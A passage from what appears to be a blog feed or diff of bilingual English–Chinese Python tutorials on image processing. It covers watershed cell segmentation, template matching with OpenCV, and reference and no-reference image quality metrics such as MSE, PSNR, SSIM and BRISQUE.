      • 在确定的背景和前景之间的区域是我们的模糊区域。
    • Watershed should find this area for us.

      • 分水岭应该帮我们找到这片区域。
    1
    2
    sure_bg = cv2.dilate(opening,kernel,iterations=10)
    plt.imshow(sure_bg, cmap='gray') # Dark region is our sure background
    <matplotlib.image.AxesImage at 0x2b36c5b2ac0>

    png

    • Finding sure foreground area using distance transform and thresholding intensities of the points inside the foreground regions are changed to distance their respective distances from the closest 0 value (boundary).

      • 利用距离变换找到确定的前景区域,并将前景区域内点的阈值强度变化为它们各自距离最近的0值(边界)的距离。

    https://www.tutorialspoint.com/opencv/opencv_distance_transformation.htm

    1
    2
    dist_transform = cv2.distanceTransform(opening,cv2.DIST_L2,5)
    plt.imshow(dist_transform, cmap='gray') # Dist transformed img.
    <matplotlib.image.AxesImage at 0x2b36bd55d00>

    png

    • Let us threshold the dist transform by starting at 1/2 its max value.

      • 让我们从dist变换的最大值的1/2开始阈值。
    1
    print(dist_transform.max())  # gives about 21.9
    21.968996
    1
    2
    ret2, sure_fg = cv2.threshold(dist_transform,0.5*dist_transform.max(),255,0)
    plt.imshow(sure_fg, cmap='gray')
    <matplotlib.image.AxesImage at 0x2b36bdc25e0>

    png

    STEP 3: Unknown

    • Later you realize that 0.25 * max value will not separate the cells well.

      • 后来你意识到0.25 * max值不能很好地分离单元格。
    • High value like 0.7 will not recognize some cells. 0.5 seems to be a good compromize

      • 像0.7这样的高值将无法识别某些单元格。0.5似乎是一个很好的折衷方案
    • Unknown ambiguous region is nothing but bkground - foreground

      • 未知的模糊区域不过是背景-前景
    1
    2
    3
    sure_fg = np.uint8(sure_fg)  # Convert to uint8 from float
    unknown = cv2.subtract(sure_bg,sure_fg)
    plt.imshow(unknown, cmap='gray')
    <matplotlib.image.AxesImage at 0x2b36be24c10>

    png

    STEP 4: Markers

    • Now we create a marker and label the regions inside.

      • 现在我们创建一个标记,并标记里面的区域。
    • For sure regions, both foreground and background will be labeled with positive numbers.

      • 对于确定的区域,前景和背景都将被标记为正数。
    • Unknown regions will be labeled 0.

      • 未知区域将被标记为0。
    • For markers let us use ConnectedComponents.

      • 对于标记,让我们使用ConnectedComponents
    • Connected components labeling scans an image and groups its pixels into components based on pixel connectivity, i.e. all pixels in a connected component share similar pixel intensity values and are in some way connected with each other.

      • 连接组件标签扫描图像,并根据像素连接性将其像素分组,即连接组件中的所有像素共享相似的像素强度值,并以某种方式相互连接。
    • Once all groups have been determined, each pixel is labeled with a graylevel or a color (color labeling) according to the component it was assigned to.

      • 一旦确定了所有的组,每个像素将根据分配给它的组件用灰度或颜色(颜色标记)标记。
    1
    2
    ret3, markers = cv2.connectedComponents(sure_fg)
    plt.imshow(markers)
    <matplotlib.image.AxesImage at 0x2b36d8060a0>

    png

    • One problem rightnow is that the entire background pixels is given value 0.

      • 现在的一个问题是,整个背景像素的值是0。
    • This means watershed considers this region as unknown.

      • 这意味着watershed认为这个区域是未知的。
    • So let us add 10 to all labels so that sure background is not 0, but 10

      • 所以让我们给所有标签加上10,这样确定的背景不是0,而是10
    1
    markers = markers + 10
    • Now, mark the region of unknown with zero
      • 现在,用零标记未知区域
    1
    2
    markers[unknown==255] = 0
    plt.imshow(markers, cmap='jet') # Look at the 3 distinct regions.
    <matplotlib.image.AxesImage at 0x2b36d8f51c0>

    png

    • Now we are ready for watershed filling.

      • 现在我们已经准备好进行流域注水了。
    1
    markers = cv2.watershed(img,markers)
    • Let us color boundaries in yellow.

      • 让我们用黄色标记边界。
    • Remember that watershed assigns boundaries a value of -1

      • 记住,分水岭的边界值是-1
    1
    img[markers == -1] = [0,255,255]  
    • label2rgb - Return an RGB image where color-coded labels are painted over the image.
      • label2rgb -返回一个RGB图像,其中彩色编码的标签涂在图像上。
    1
    2
    img2 = color.label2rgb(markers, bg_label=0)
    plt.imshow(img2)
    <matplotlib.image.AxesImage at 0x2b36d9c4970>

    png

    1
    plt.imshow(cv2.cvtColor(img, cv2.COLOR_BGR2RGB))
    <matplotlib.image.AxesImage at 0x2b36da2de50>

    png

    • Now, time to extract properties of detected cells

      • 现在,是时候提取检测到的细胞的属性了
    • Directly capturing props to pandas dataframe

      • 直接捕捉pandas dataframe
    1
    2
    3
    4
    5
    6
    7
    8
    9
    props = measure.regionprops_table(markers, cells, 
    properties=['label',
    'area', 'equivalent_diameter',
    'mean_intensity', 'solidity', 'orientation',
    'perimeter'])

    import pandas as pd
    df = pd.DataFrame(props)
    df.head()
    label area equivalent_diameter mean_intensity solidity orientation perimeter
    0 10 1400327 1335.272149 4.860480 0.924828 -1.499676 18900.592991
    1 11 1092 37.287767 80.092491 0.923858 1.282415 138.953319
    2 12 1142 38.131871 151.830998 0.955649 0.670516 132.296465
    3 13 1108 37.559944 78.256318 0.891392 -1.062275 146.852814
    4 14 1670 46.111929 106.720359 0.862603 1.532047 188.823376
    • To delete small regions…
      • 删除较小区域…
    1
    2
    df = df[df['area'] > 50]
    df.head()
    label area equivalent_diameter mean_intensity solidity orientation perimeter
    0 10 1400327 1335.272149 4.860480 0.924828 -1.499676 18900.592991
    1 11 1092 37.287767 80.092491 0.923858 1.282415 138.953319
    2 12 1142 38.131871 151.830998 0.955649 0.670516 132.296465
    3 13 1108 37.559944 78.256318 0.891392 -1.062275 146.852814
    4 14 1670 46.111929 106.720359 0.862603 1.532047 188.823376
    • Convert to micron scale
      • 转换成微米级
    1
    2
    3
    df['area_sq_microns'] = df['area'] * (pixels_to_um ** 2)
    df['equivalent_diameter_microns'] = df['equivalent_diameter'] * (pixels_to_um)
    df.head()
    label area equivalent_diameter mean_intensity solidity orientation perimeter area_sq_microns equivalent_diameter_microns
    0 10 1400327 1335.272149 4.860480 0.924828 -1.499676 18900.592991 288629.799932 606.213556
    1 11 1092 37.287767 80.092491 0.923858 1.282415 138.953319 225.078672 16.928646
    2 12 1142 38.131871 151.830998 0.955649 0.670516 132.296465 235.384472 17.311869
    3 13 1108 37.559944 78.256318 0.891392 -1.062275 146.852814 228.376528 17.052215
    4 14 1670 46.111929 106.720359 0.862603 1.532047 188.823376 344.213720 20.934816

    Tutorial 58 - Object detection using template matching

    Template Matching 模式匹配

    OpenCV: Template Matching

    OBJECT DETECTION WITH TEMPLATES

    • Need a source image and a template image.

      • 需要一个源图像和一个模板图像。
    • The template image T is slided over the source image (as in 2D convolution), and the program tries to find matches using statistics.

      • 模板图像T在源图像上滑动(在2D卷积中),程序尝试使用统计信息找到匹配。
    • Several comparison methods are implemented in OpenCV.

      • OpenCV中实现了几种比较方法。
    • It returns a grayscale image, where each pixel denotes how much does the neighbourhood of that pixel match with template.

      • 它返回一个灰度图像,其中每个像素表示该像素的邻域与模板的匹配程度。
    • Once you got the result, you can use cv2.minMaxLoc() function to find where is the maximum/minimum value. Take it as the top-left corner of the rectangle and take (w,h) as width and height of the rectangle.

      • 得到结果后,可以使用cv2.minMaxLoc()函数来查找最大值/最小值的位置。
        将其作为矩形的左上角,并将(w,h)作为矩形的宽和高。
    • That rectangle can be drawn on the region of matched template.

      • 该矩形可以绘制在匹配模板的区域上。

    • Template matching, single object in an image.

      • 模板匹配,图像中单个对象。
    • Multiple methods to see which one works best.

      • 多种方法,看看哪一种效果最好。
    1
    2
    3
    import cv2
    import numpy as np
    import matplotlib.pyplot as plt
    1
    2
    3
    img_rgb = cv2.imread('images/Ti_powder.tif')
    img_gray = cv2.cvtColor(img_rgb, cv2.COLOR_BGR2GRAY)
    plt.imshow(img_gray, cmap='gray')
    <matplotlib.image.AxesImage at 0x263a924c550>

    png

    1
    2
    template = cv2.imread('images/Ti_powder_single.tif', 0)
    plt.imshow(template, cmap='gray')
    <matplotlib.image.AxesImage at 0x263ae0a4be0>

    png

    1
    2
    h, w = template.shape[::]
    h, w
    (18, 16)
    • For TM_SQDIFF, Good match yields minimum value; bad match yields large values

      • 对于 TM_SQDIFF,良好匹配产生最小值; 不匹配会产生较大的值
    • For all others it is exactly opposite, max value = good fit.

      • 对于所有其他的情况,情况正好相反,最大值 = 良好的适合度。
    1
    2
    3
    4
    # methods available: ['cv2.TM_CCOEFF', 'cv2.TM_CCOEFF_NORMED', 'cv2.TM_CCORR',
    # 'cv2.TM_CCORR_NORMED', 'cv2.TM_SQDIFF', 'cv2.TM_SQDIFF_NORMED']
    res = cv2.matchTemplate(img_gray, template, cv2.TM_SQDIFF)
    plt.imshow(res, cmap='gray')
    <matplotlib.image.AxesImage at 0x263ae0ff8e0>

    png

    1
    2
    min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(res)
    min_val, max_val, min_loc, max_loc
    (4.0, 7702931.0, (318, 418), (66, 407))
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    # Change to max_loc for all excerpt for TM_SQDIFF
    # 将除 TM_SQDIFF 外的所有数据更改为 max_loc
    top_left = min_loc
    bottom_right = (top_left[0] + w, top_left[1] + h)

    # Black rectangle with thickness 2.
    # 绘制厚度为 2 的黑色矩形。
    cv2.rectangle(img_gray, top_left, bottom_right, 0, 1)

    plt.imshow(img_gray, cmap='gray')
    <matplotlib.image.AxesImage at 0x263ae4de220>

    png


    Template matching - multiple objects

    • For multiple occurances, cv2.minMaxLoc() won’t give all the locations

      • 对于多次出现,cv2.minMaxLoc()不会给出所有的位置
    • So we need to set a threshold

      • 所以我们需要设置一个阈值
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    import cv2
    import numpy as np
    from matplotlib import pyplot as plt

    img_rgb = cv2.imread('images/Ti_powder.tif')
    img_gray = cv2.cvtColor(img_rgb, cv2.COLOR_BGR2GRAY)
    template = cv2.imread('images/Ti_powder_single.tif',0)
    h, w = template.shape[::]

    res = cv2.matchTemplate(img_gray, template, cv2.TM_CCOEFF_NORMED)
    plt.imshow(res, cmap='gray')
    <matplotlib.image.AxesImage at 0x263ae67ac40>

    png

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    # Pick only values above 0.8. For TM_CCOEFF_NORMED, larger values = good fit.
    # 只选择高于0.8的值。对于TM_CCOEFF_NORMED,较大的值=良好的拟合。
    threshold = 0.8

    loc = np.where( res >= threshold)
    # Outputs 2 arrays. Combine these arrays to get x,y coordinates - take x from one array and y from the other.
    # 输出2个数组。组合这些数组得到x,y坐标——从一个数组取x,从另一个数组取y。

    # Reminder: ZIP function is an iterator of tuples where first item in each iterator is paired together, then the second item and then third, etc.
    # 提醒:ZIP函数是一个元组迭代器,其中每个迭代器中的第一个项配对在一起,然后是第二个项,然后是第三个,等等。

    for pt in zip(*loc[::-1]): # -1 to swap the values as we assign x and y coordinate to draw the rectangle. -1来交换我们分配的x和y坐标来绘制矩形的值。
    # Draw rectangle around each object. We know the top left (pt), draw rectangle to match the size of the template image. 在每个物体周围画一个矩形。我们知道左上角(pt),绘制矩形以匹配模板图像的大小。
    cv2.rectangle(img_rgb, pt, (pt[0] + w, pt[1] + h), (0, 0, 255), 1) # Red rectangles with thickness 2.
    1
    plt.imshow(img_rgb)
    <matplotlib.image.AxesImage at 0x263a957fc10>

    png

    ]]>
    @@ -9219,7 +9219,7 @@ /posts/DIP-Introductory%20python%20tutorials%20for%20image%20processing(48-50)-Image%20Quality/ - 正文

    Tutorial 48 - Image quality metrics using a reference image - in python

    Common metrics to quantify image quality(reference based) 量化图像质量的常用度量

    • Mean squared error(MSE), $MSE=\frac{1}{n}\Sigma(y-\hat{y})^2$(The square of the difference between actual and predicted)

    • Root mean squared error(RMSE) - Square root of MSE

    • Peak signal to noise ratio(PSNR), $PSNR=10\cdot \log_{10}\left(\frac{MAX_I^2}{MSE}\right)$(MAX is the maximum pixel value for 8 bit image, it is 255)

    • SSI: Takes texture into account.

    import cv2
    import numpy as np
    from sewar import full_ref
    from skimage import metrics

    ref_img = cv2.imread("images/sandstone.tif", 1)
    img = cv2.imread("images/sandstone_blur_2sigma.tif", 1)
    mse_skimg = metrics.mean_squared_error(ref_img, img)
    print("MSE: based on scikit-image = ", mse_skimg)
    MSE: based on scikit-image =  170.83926291047953
    psnr_skimg = metrics.peak_signal_noise_ratio(ref_img, img, data_range=None)
    print("PSNR: based on scikit-image = ", psnr_skimg)
    PSNR: based on scikit-image =  25.80492671881574
    rmse_skimg = metrics.normalized_root_mse(ref_img, img)
    print("RMSE: based on scikit-image = ", rmse_skimg)
    RMSE: based on scikit-image =  0.10647019507436659
    from skimage.metrics import structural_similarity as ssim
    ssim_skimg = ssim(ref_img, img,
    data_range = img.max() - img.min(),
    multichannel = True)
    print("SSIM: based on scikit-image = ", ssim_skimg)
    SSIM: based on scikit-image =  0.6631528566884437C:\Users\gzjzx\AppData\Local\Temp\ipykernel_7180\3842229405.py:2: FutureWarning: `multichannel` is a deprecated argument name for `structural_similarity`. It will be removed in version 1.0. Please use `channel_axis` instead.  ssim_skimg = ssim(ref_img, img,

    如果两幅图片完全相同:

    img = ref_img
    mse_skimg = metrics.mean_squared_error(ref_img, img)
    print("MSE: based on scikit-image = ", mse_skimg)
    psnr_skimg = metrics.peak_signal_noise_ratio(ref_img, img, data_range=None)
    print("PSNR: based on scikit-image = ", psnr_skimg)
    rmse_skimg = metrics.normalized_root_mse(ref_img, img)
    print("RMSE: based on scikit-image = ", rmse_skimg)
    from skimage.metrics import structural_similarity as ssim
    ssim_skimg = ssim(ref_img, img,
    data_range = img.max() - img.min(),
    multichannel = True)
    print("SSIM: based on scikit-image = ", ssim_skimg)
    MSE: based on scikit-image =  0.0PSNR: based on scikit-image =  infRMSE: based on scikit-image =  0.0SSIM: based on scikit-image =  1.0C:\Users\gzjzx\anaconda3\lib\site-packages\skimage\metrics\simple_metrics.py:163: RuntimeWarning: divide by zero encountered in double_scalars  return 10 * np.log10((data_range ** 2) / err)C:\Users\gzjzx\AppData\Local\Temp\ipykernel_7180\397432051.py:8: FutureWarning: `multichannel` is a deprecated argument name for `structural_similarity`. It will be removed in version 1.0. Please use `channel_axis` instead.  ssim_skimg = ssim(ref_img, img,
    ref_img = cv2.imread("images/sandstone.tif", 1)
    img = cv2.imread("images/sandstone_blur_2sigma.tif", 1)
    • ERGAS Global relative error
    """
    calculates global relative error

    GT: first (original) input image.
    P: second (deformed) input image.
    r: ratio of high resolution to low resolution (default=4).
    ws: sliding window size (default = 8).

    :returns: float -- ergas value.
    """
    ergas_img = full_ref.ergas(ref_img, img, r=4, ws=8)
    print("EGRAS: global relative error = ", ergas_img)
    EGRAS: global relative error =  5267.3334783814835
    • Multiscale structural similarity index
    """calculates multi-scale structural similarity index (ms-ssim).

    :param GT: first (original) input image.
    :param P: second (deformed) input image.
    :param weights: weights for each scale (default = [0.0448, 0.2856, 0.3001, 0.2363, 0.1333]).
    :param ws: sliding window size (default = 11).
    :param K1: First constant for SSIM (default = 0.01).
    :param K2: Second constant for SSIM (default = 0.03).
    :param MAX: Maximum value of datarange (if None, MAX is calculated using image dtype).

    :returns: float -- ms-ssim value.
    """
    msssim_img=full_ref.msssim(ref_img, img, weights=[0.0448, 0.2856, 0.3001, 0.2363, 0.1333], ws=11, K1=0.01, K2=0.03, MAX=None)
    print("MSSSIM: multi-scale structural similarity index = ", msssim_img)
    MSSSIM: multi-scale structural similarity index =  (0.8966196945619169+0j)
    • PSNR
    """calculates peak signal-to-noise ratio (psnr).

    :param GT: first (original) input image.
    :param P: second (deformed) input image.
    :param MAX: maximum value of datarange (if None, MAX is calculated using image dtype).

    :returns: float -- psnr value in dB.
    """
    psnr_img=full_ref.psnr(ref_img, img, MAX=None)
    print("PSNR: peak signal-to-noise ratio = ", psnr_img)
    PSNR: peak signal-to-noise ratio =  25.80492671881574
    • PSNRB: Calculates PSNR with Blocking Effect Factor for a given pair of images (PSNR-B)
    """Calculates PSNR with Blocking Effect Factor for a given pair of images (PSNR-B)

    :param GT: first (original) input image in YCbCr format or Grayscale.
    :param P: second (corrected) input image in YCbCr format or Grayscale.

    :return: float -- psnr_b.
    """
    psnrb_img = full_ref.psnrb(ref_img, img)
    print("PSNRB: peak signal-to-noise ratio with blocking effect = ", psnrb_img)
    PSNRB: peak signal-to-noise ratio with blocking effect =  25.80492671881574
    • relative average spectral error (rase)
    """calculates relative average spectral error (rase).

    :param GT: first (original) input image.
    :param P: second (deformed) input image.
    :param ws: sliding window size (default = 8).

    :returns: float -- rase value.
    """
    RASE_img = full_ref.rase(ref_img, img, ws=8)
    print("RASE: relative average spectral error = ", RASE_img)
    RASE: relative average spectral error =  760.2741004137694
    • RMSE
    """calculates root mean squared error (rmse).

    :param GT: first (original) input image.
    :param P: second (deformed) input image.

    :returns: float -- rmse value.
    """
    rmse_img = full_ref.rmse(ref_img, img)
    print("RMSE: root mean squared error = ", rmse_img)
    RMSE: root mean squared error =  13.07054944944854
    • root mean squared error (rmse) using sliding window
    """calculates root mean squared error (rmse) using sliding window.

    :param GT: first (original) input image.
    :param P: second (deformed) input image.
    :param ws: sliding window size (default = 8).

    :returns: tuple -- rmse value,rmse map.
    """
    rmse_sw_img = full_ref.rmse_sw(ref_img, img, ws=8)
    print("RMSE_SW: root mean squared error with sliding window = ", rmse_sw_img)
    RMSE_SW: root mean squared error with sliding window =  (11.495024661505164, array([[[6.31466547, 6.31466547, 6.31466547],        [6.34182545, 6.34182545, 6.34182545],        [6.10327781, 6.10327781, 6.10327781],        ...,        [7.47704821, 7.47704821, 7.47704821],        [7.13267131, 7.13267131, 7.13267131],        [7.23057743, 7.23057743, 7.23057743]],       [[5.84433486, 5.84433486, 5.84433486],        [5.8255901 , 5.8255901 , 5.8255901 ],        [5.52409495, 5.52409495, 5.52409495],        ...,        [8.14996166, 8.14996166, 8.14996166],        [7.76912962, 7.76912962, 7.76912962],        [7.94217382, 7.94217382, 7.94217382]],       [[5.9187203 , 5.9187203 , 5.9187203 ],        [5.84967948, 5.84967948, 5.84967948],        [5.51701912, 5.51701912, 5.51701912],        ...,        [7.7741559 , 7.7741559 , 7.7741559 ],        [7.49478986, 7.49478986, 7.49478986],        [7.71463706, 7.71463706, 7.71463706]],       ...,       [[6.12627538, 6.12627538, 6.12627538],        [5.84967948, 5.84967948, 5.84967948],        [5.89623821, 5.89623821, 5.89623821],        ...,        [6.6602834 , 6.6602834 , 6.6602834 ],        [6.55982088, 6.55982088, 6.55982088],        [6.43234017, 6.43234017, 6.43234017]],       [[5.92927061, 5.92927061, 5.92927061],        [5.71319744, 5.71319744, 5.71319744],        [5.8656841 , 5.8656841 , 5.8656841 ],        ...,        [6.66848933, 6.66848933, 6.66848933],        [6.51800391, 6.51800391, 6.51800391],        [6.27245965, 6.27245965, 6.27245965]],       [[5.69539287, 5.69539287, 5.69539287],        [5.48007755, 5.48007755, 5.48007755],        [5.55512151, 5.55512151, 5.55512151],        ...,        [6.83053805, 6.83053805, 6.83053805],        [6.63678198, 6.63678198, 6.63678198],        [6.09559267, 6.09559267, 6.09559267]]]))
    • calculates spectral angle mapper (sam).
    """calculates spectral angle mapper (sam).

    :param GT: first (original) input image.
    :param P: second (deformed) input image.

    :returns: float -- sam value.
    """
    ref_sam_img = full_ref.sam(ref_img, img)
    print("REF_SAM: spectral angle mapper = ", ref_sam_img)
    REF_SAM: spectral angle mapper =  0.106389325534101
    • Structural similarity index
    """calculates structural similarity index (ssim).

    :param GT: first (original) input image.
    :param P: second (deformed) input image.
    :param ws: sliding window size (default = 8).
    :param K1: First constant for SSIM (default = 0.01).
    :param K2: Second constant for SSIM (default = 0.03).
    :param MAX: Maximum value of datarange (if None, MAX is calculated using image dtype).

    :returns: tuple -- ssim value, cs value.
    """
    ssim_img = full_ref.ssim(ref_img, img, ws=11, K1=0.01, K2=0.03, MAX=None, fltr_specs=None, mode='valid')
    print("SSIM: structural similarity index = ", ssim_img)
    SSIM: structural similarity index =  (0.7221593484301166, 0.7224356503602157)
    • Universal image quality index
    """calculates universal image quality index (uqi).

    :param GT: first (original) input image.
    :param P: second (deformed) input image.
    :param ws: sliding window size (default = 8).

    :returns: float -- uqi value.
    """
    UQI_img = full_ref.uqi(ref_img, img, ws=8)
    print("UQI: universal image quality index = ", UQI_img)
    UQI: universal image quality index =  0.9892148366610988
    • Pixel Based Visual Information Fidelity (vif-p)
    """calculates Pixel Based Visual Information Fidelity (vif-p).

    :param GT: first (original) input image.
    :param P: second (deformed) input image.
    :param sigma_nsq: variance of the visual noise (default = 2)

    :returns: float -- vif-p value.
    """
    VIFP_img = full_ref.vifp(ref_img, img, sigma_nsq=2)
    print("VIFP: Pixel Based Visual Information Fidelity = ", VIFP_img)
    VIFP: Pixel Based Visual Information Fidelity =  0.27836263237462544

    Tutorial 49 - No reference based image quality estimation by quantifying sharpness

    论文: Sharpness Estimation for Document and Scene Images

    Sharpness Estimation for Document and Scene Images

    pip install -e.
    Obtaining file:///C:/Users/gzjzx/Jupyter/DIP/pydom-master  Preparing metadata (setup.py): started  Preparing metadata (setup.py): finished with status 'done'Requirement already satisfied: numpy in c:\users\gzjzx\anaconda3\lib\site-packages (from pydom==0.1) (1.23.1)Requirement already satisfied: opencv-python in c:\users\gzjzx\anaconda3\lib\site-packages (from pydom==0.1) (4.6.0.66)Installing collected packages: pydom  Running setup.py develop for pydomSuccessfully installed pydom-0.1Note: you may need to restart the kernel to use updated packages.
    from dom import DOM
    import cv2

    img1 = cv2.imread("images/Osteosarcoma_01.tif", 1)
    img2 = cv2.imread("images/Osteosarcoma_01_1sigma_blur.tif", 1)
    img3 = cv2.imread("images/Osteosarcoma_01_2sigma_blur.tif", 1)
    iqa = DOM()
    • 计算清晰度指数:
    score1 = iqa.get_sharpness(img1)
    score2 = iqa.get_sharpness(img2)
    score3 = iqa.get_sharpness(img3)

    print("Sharpness for reference image:", score1)
    print("Sharpness for 1sigma blurred image:", score2)
    print("Sharpness for 2sigma blurred image:", score3)
    Sharpness for reference image: 0.720903262659802Sharpness for 1sigma blurred image: 0.8156158621086446Sharpness for 2sigma blurred image: 0.5502472959626157

    Tutorial 50 - No reference based image quality using BRISQUE -in Python

    • BRISQUE calculates the no-reference image quality score for an image using the Blind/Referenceless Image Spatial Quality Evaluator(BRISQUE).
      • BRISQUE 使用盲/无参考图像空间质量评估器(BRISQUE)计算图像的无参考图像质量分数。
    • BRISQUE score is computed using a support vector regression (SVR) model trained on an image database with corresponding differential mean opinion score (DMOS) values.
      • BRISQUE 评分的计算使用支持向量回归(SVR)模型训练的图像数据库与相应的差分平均意见评分(DMOS)值。
    • The database contains images with known distortion such as compression artifacts, blurring, and noise.
      • 该数据库包含已知失真的图像,如压缩伪影、模糊和噪声。
    • The image to be scored must have at least one of the distortions for which th model was trained.
      • 要评分的图像必须至少有一个失真的模型训练。
    pip install image-quality
    import numpy as np
    from skimage import io, img_as_float
    import imquality.brisque as brisque

    暂时跑不了…过段时间再解决?

    #img = img_as_float(io.imread('noisy_images/BSE.jpg', as_gray=True))
    img = img_as_float(io.imread('images/noisy_images/sandstone_25sigma_noisy.tif', as_gray=True))

    score = brisque.score(img)
    print("Brisque score = ", score)

    # Now let us check BRISQUE scores for a few blurred images.

    img0 = img_as_float(io.imread('images/blurred_images/sandstone.tif', as_gray=True))
    img2 = img_as_float(io.imread('images/blurred_images/sandstone_2sigma_blur.tif', as_gray=True))
    img3 = img_as_float(io.imread('images/blurred_images/sandstone_3sigma_blur.tif', as_gray=True))
    img5 = img_as_float(io.imread('images/blurred_images/sandstone_5sigma_blur.tif', as_gray=True))

    score0 = brisque.score(img0)
    score2 = brisque.score(img2)
    score3 = brisque.score(img3)
    score5 = brisque.score(img5)

    print("BRISQUE Score for 0 blur = ", score0)
    print("BRISQUE Score for 2sigma blur = ", score2)
    print("BRISQUE Score for 3sigma blur = ", score3)
    print("BRISQUE Score for 5sigma blur = ", score5)
    from skimage.metrics import peak_signal_noise_ratio

    psnr_1 = peak_signal_noise_ratio(img0, img1)
    psnr_2 = peak_signal_noise_ratio(img0, img2)

    print("PSNR for 1sigma blur = ", psnr_1)
    print("PSNR for 2sigma blur = ", psnr_2)
    PSNR for 1sigma blur =  37.288893529075025PSNR for 2sigma blur =  33.23605158876105
    ]]>
    + 正文

    Tutorial 48 - Image quality metrics using a reference image - in python

    Common metrics to quantify image quality(reference based) 量化图像质量的常用度量

    • Mean squared error(MSE), $MSE=\frac{1}{n}\Sigma(y-\hat{y})^2$(The square of the difference between actual and predicted)

    • Root mean squared error(RMSE) - Square root of MSE

    • Peak signal to noise ratio(PSNR), $PSNR=10\cdot \log_{10}\left(\frac{MAX_I^2}{MSE}\right)$(MAX is the maximum pixel value for 8 bit image, it is 255)

    • SSI: Takes texture into account.

    1
    2
    3
    4
    5
    6
    7
    import cv2
    import numpy as np
    from sewar import full_ref
    from skimage import metrics

    ref_img = cv2.imread("images/sandstone.tif", 1)
    img = cv2.imread("images/sandstone_blur_2sigma.tif", 1)
    1
    2
    mse_skimg = metrics.mean_squared_error(ref_img, img)
    print("MSE: based on scikit-image = ", mse_skimg)
    MSE: based on scikit-image =  170.83926291047953
    1
    2
    psnr_skimg = metrics.peak_signal_noise_ratio(ref_img, img, data_range=None)
    print("PSNR: based on scikit-image = ", psnr_skimg)
    PSNR: based on scikit-image =  25.80492671881574
    1
    2
    rmse_skimg = metrics.normalized_root_mse(ref_img, img)
    print("RMSE: based on scikit-image = ", rmse_skimg)
    RMSE: based on scikit-image =  0.10647019507436659
    1
    2
    3
    4
    5
    from skimage.metrics import structural_similarity as ssim
    ssim_skimg = ssim(ref_img, img,
    data_range = img.max() - img.min(),
    multichannel = True)
    print("SSIM: based on scikit-image = ", ssim_skimg)
    SSIM: based on scikit-image =  0.6631528566884437C:\Users\gzjzx\AppData\Local\Temp\ipykernel_7180\3842229405.py:2: FutureWarning: `multichannel` is a deprecated argument name for `structural_similarity`. It will be removed in version 1.0. Please use `channel_axis` instead.  ssim_skimg = ssim(ref_img, img,

    如果两幅图片完全相同:

    1
    img = ref_img
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    mse_skimg = metrics.mean_squared_error(ref_img, img)
    print("MSE: based on scikit-image = ", mse_skimg)
    psnr_skimg = metrics.peak_signal_noise_ratio(ref_img, img, data_range=None)
    print("PSNR: based on scikit-image = ", psnr_skimg)
    rmse_skimg = metrics.normalized_root_mse(ref_img, img)
    print("RMSE: based on scikit-image = ", rmse_skimg)
    from skimage.metrics import structural_similarity as ssim
    ssim_skimg = ssim(ref_img, img,
    data_range = img.max() - img.min(),
    multichannel = True)
    print("SSIM: based on scikit-image = ", ssim_skimg)
    MSE: based on scikit-image =  0.0PSNR: based on scikit-image =  infRMSE: based on scikit-image =  0.0SSIM: based on scikit-image =  1.0C:\Users\gzjzx\anaconda3\lib\site-packages\skimage\metrics\simple_metrics.py:163: RuntimeWarning: divide by zero encountered in double_scalars  return 10 * np.log10((data_range ** 2) / err)C:\Users\gzjzx\AppData\Local\Temp\ipykernel_7180\397432051.py:8: FutureWarning: `multichannel` is a deprecated argument name for `structural_similarity`. It will be removed in version 1.0. Please use `channel_axis` instead.  ssim_skimg = ssim(ref_img, img,
    1
    2
    ref_img = cv2.imread("images/sandstone.tif", 1)
    img = cv2.imread("images/sandstone_blur_2sigma.tif", 1)
    • ERGAS Global relative error
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    """
    calculates global relative error

    GT: first (original) input image.
    P: second (deformed) input image.
    r: ratio of high resolution to low resolution (default=4).
    ws: sliding window size (default = 8).

    :returns: float -- ergas value.
    """
    ergas_img = full_ref.ergas(ref_img, img, r=4, ws=8)
    print("EGRAS: global relative error = ", ergas_img)
    EGRAS: global relative error =  5267.3334783814835
    • Multiscale structural similarity index
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    """calculates multi-scale structural similarity index (ms-ssim).

    :param GT: first (original) input image.
    :param P: second (deformed) input image.
    :param weights: weights for each scale (default = [0.0448, 0.2856, 0.3001, 0.2363, 0.1333]).
    :param ws: sliding window size (default = 11).
    :param K1: First constant for SSIM (default = 0.01).
    :param K2: Second constant for SSIM (default = 0.03).
    :param MAX: Maximum value of datarange (if None, MAX is calculated using image dtype).

    :returns: float -- ms-ssim value.
    """
    msssim_img=full_ref.msssim(ref_img, img, weights=[0.0448, 0.2856, 0.3001, 0.2363, 0.1333], ws=11, K1=0.01, K2=0.03, MAX=None)
    print("MSSSIM: multi-scale structural similarity index = ", msssim_img)
    MSSSIM: multi-scale structural similarity index =  (0.8966196945619169+0j)
    • PSNR
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    """calculates peak signal-to-noise ratio (psnr).

    :param GT: first (original) input image.
    :param P: second (deformed) input image.
    :param MAX: maximum value of datarange (if None, MAX is calculated using image dtype).

    :returns: float -- psnr value in dB.
    """
    psnr_img=full_ref.psnr(ref_img, img, MAX=None)
    print("PSNR: peak signal-to-noise ratio = ", psnr_img)
    PSNR: peak signal-to-noise ratio =  25.80492671881574
    • PSNRB: Calculates PSNR with Blocking Effect Factor for a given pair of images (PSNR-B)
    1
    2
    3
    4
    5
    6
    7
    8
    9
    """Calculates PSNR with Blocking Effect Factor for a given pair of images (PSNR-B)

    :param GT: first (original) input image in YCbCr format or Grayscale.
    :param P: second (corrected) input image in YCbCr format or Grayscale.

    :return: float -- psnr_b.
    """
    psnrb_img = full_ref.psnrb(ref_img, img)
    print("PSNRB: peak signal-to-noise ratio with blocking effect = ", psnrb_img)
    PSNRB: peak signal-to-noise ratio with blocking effect =  25.80492671881574
    • relative average spectral error (rase)
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    """calculates relative average spectral error (rase).

    :param GT: first (original) input image.
    :param P: second (deformed) input image.
    :param ws: sliding window size (default = 8).

    :returns: float -- rase value.
    """
    RASE_img = full_ref.rase(ref_img, img, ws=8)
    print("RASE: relative average spectral error = ", RASE_img)
    RASE: relative average spectral error =  760.2741004137694
    • RMSE
    1
    2
    3
    4
    5
    6
